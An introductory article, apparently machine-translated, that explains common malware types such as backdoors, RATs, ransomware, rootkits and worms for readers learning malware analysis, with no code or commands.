In this article we will look at different types of malware and what they do. When performing static or dynamic malware analysis, it is crucial to have a good idea of the different types of malware available so that you can recognize and focus on them. During static malware analysis, imported DLLs and features often tell us about the malware’s intentions and behavior. For example, when malware imports network functions along with Windows Registry Editing and Compression functions, we may be dealing with spyware, bootloader malware or a Trojan that runs itself or other malware when it starts up. In the simplest case of statically imported DLL files, you can use an application such as Dependency Walker to find out which features are used by the malware. Further checking of DLLs, functions, PE headers and resources should significantly narrow down possible types of malware. Let us continue to look at different types of malware and what they do.
Adware as malware is malicious software that presents unwanted advertising to the user. This type of malware often uses pop-ups that cannot be closed by the user. Advertising software is often included in free software and browser toolbars. Malware that also collects user data, actions and other information for targeted advertising is called spyware.
Backdoor is a piece of malicious code that allows an attacker to connect to an infected computer and gain control over the target machine. In most cases, no authentication is required to log on to a remote computer. The backdoor is often generated by a trojan, which goes unnoticed if the host doesn’t have effective detection mechanisms. Backdoors can use many methods to communicate. Also, port 80 is typically used by malware using the HTTP protocol, since this port is open on most computers connected to the Internet. We will discuss 2 types of backdoors; reverse and Remote Access/Administration Tool (RAT).
A reverseshell is a connection initiated by an infected host to an attacker that allows the attacker access to the host through a shell. The reverseshell is often created by a trojan and acts as a backdoor on the infected host. Once the reverseshell is configured, the attacker can execute commands as if they were executed locally. Malware developers can set up reverse switches in several ways. Typically used methods for reverse shells are Netcat and Smd.exe, packaged in malware. The simple method used by malicious programs using Windows CMD to configure the reverseshell is to create a socket to connect to the attacker and bind him to standard streams (standard input, output) for cmd.exe. Cmd.exe runs with the window closed to hide it from the victim’s eyes, and can be used to execute commands on an infected host.
RAT – Remote Access Trojan
A Remote Access Trojan (RAT), sometimes called a remote administration or remote access tool, is software that allows an attacker to gain control over an infected host using a backdoor. In this article we will call it a remote access trojan to highlight the malicious RAT. We’re talking about malicious RATs, not those that are used by system administrators or software vendors for remote support and troubleshooting. Remote Access Trojans are often included in free software and sent as email attachments.
A botnet is a network of remotely managed private computers with backdoors that are controlled by a management and control server. All infected hosts in the botnet are controlled as a group and receive the same instructions from the server controlled by the attacker. Bots are often used for spamming, distributed denial of service (DDoS) attacks, or malware distribution.
Browser Hijacker is a piece of malicious code designed to control your browser settings, such as a homepage or a standard search engine. Browser hijackers are often included in free software and browser toolbars, and may also contain adware and spyware. Some browser hijackers also change your browser’s proxy settings, compromising your privacy and online security.
Downloader Malware is malware that downloads other malicious software. Attackers often infect the computer with malware downloaders when they first access the system. The downloader malware invisibly infects the target machine with other malicious programs.
Information Stealing Malware
Information-stealing malware is a set of types of malware that are designed to steal information such as credit card numbers, bank account details, account details and other personal information. The information collected is usually sent to an attacker, who often uses it to gain access to your personal account or to post it on the Internet. The malware often manifests itself as keyboard spies, passwords (hashes) and sniffers. Stolen information is often sent to a management and control server for further processing.
Keylogger is a malicious piece of software (or hardware) that records keystrokes to retrieve passwords, conversations and other personal data. The keystrokes that are recorded are then sent to the attacker. Keylogger is a very effective way for cybercriminals to steal passwords as there is no need to crack hashes, decrypt information or listen to secure connections for passwords.
A Launcher is a piece of malicious software that is used to run other malicious programs. This piece of malware is often combined with malicious downloaders. The Launcher Malware often uses hidden and unconventional methods to run other malicious code to avoid detection.
Technically speaking, all malicious programs that prevent a user from accessing a computer or files and require money in exchange for access are called extortionists. Ransomware often encrypts your hard drive or files and requires money in exchange for a decryption key. This type of extortionist is also called a crypto blocker. Once infected, a shark provides the user with several payment methods that can be used to unlock the computer or decrypt files.
Ransomware is becoming more and more popular over time because it is very beneficial for malware developers. Especially extortionists, combined with anonymous payment methods such as bitcoin, make this type of malware very profitable and reduces the risk of being caught. Popular malware extortionists are Cryptolocker, Cryptowall and Tox Ransomware, which are known as the first extortion programs as a service available to everyone through the TOR network.
Rutkit is malicious software designed to hide the existence of other malicious programs. Hidden malware is often a backdoor that provides full access to an attacker or steals information. Rootkits can be difficult to detect and remove depending on where the rootkit is located; for example, firmware-level rootkits may require hardware replacement, while kernel-level rootkits may require a new operating system installation.
Another dangerous and almost impossible to detect is the bootkit. A bootkit is a rootkit hidden in the boot sector that infects the main boot record. This type of rootkit can bypass disk encryption, for example, because the Master Boot Record (MBR) is not encrypted. The MBR contains software to decrypt the drive. The bootloader is a piece of code that starts before the operating system.
Scareware is malicious software that forces a victim to buy something, scaring him or her. You can also call it blackmail software because it often involves embarrassing viruses or files. The most common malware looks like a virus scanner that has detected some viruses that will be removed once the victim has purchased a virus scanner. In fact, only scareware .
Scareware often uses intimidating tactics that confuse the victim to avoid the victim escalating the problem to the system administrator at work or calling for professional help, for example, to remove the virus. Because of this tactic, many victims will pay for the software to remove the virus silently. Scareware or blackmailing malware as an extortionist is very beneficial to malware developers.
Spam Sending Malware
Spam Sending Malware is malicious software that uses an infected machine to send spam. The malware sending spam can be part of a botnet controlled by a management and control server that acts as a distributed network for sending spam. Because of the distributed approach, there is no single point of failure if ¼ of the infected machines are cleaned and the remaining 3/4 continue to send spam. Big botnets can send billions of spam messages per week, and very often new malware is distributed along with spam messages. Spamming malware can cause trouble because your ISP will disable your internet connection or your email address can be blacklisted, so be sure to remove this type of malware as soon as possible. This type of malware is beneficial to malware developers because they can sell spam services.
A Trojan or Trojan horse that is malware is a malicious program that acts as a backdoor.
Just like the ancient Greek story of a wooden horse with Greek troops inside that was used to invade the city of Troy, a Trojan in computer calculations looks like a normal application, media or any other file but contains a malicious payload. Trojans are often distributed through social engineering, where the victim is cheated by running a file or application with the Trojan. Most Trojans contain backdoors that can be used by an attacker to steal information, spread other malware, or use resources from an infected machine on a botnet. Computer Trojans have been around for a long time and there are several old and popular Trojans: Netbus, SubSeven or Sub7 and Back Orifice or BO.
A virus is a malicious program that copies itself to other applications, files or even the boot sector. The virus can then do whatever it is programmed to do, such as steal information, log keystrokes, or even make your computer useless. The defining characteristic of the virus is that it replicates itself and inserts malicious code into other programs without user consent. Like most other malicious programs, the virus is intended to make a profit.
A worm is a malicious program that copies itself to spread and infect other systems. Computer worms use networks, links, P2P networks, email, and exploit vulnerabilities to spread. The difference with a virus is that the virus inserts code into other programs where the worm does not do so and replicates only itself. Worms do not necessarily contain payloads, but most worms do. Worms can also be designed to spread only without a payload.
I hope this article was useful to you. The most important purpose of this article is to show you what little guys are good at. Now, if you catch the virus, you will know what kind of virus it is and you can easily fight it!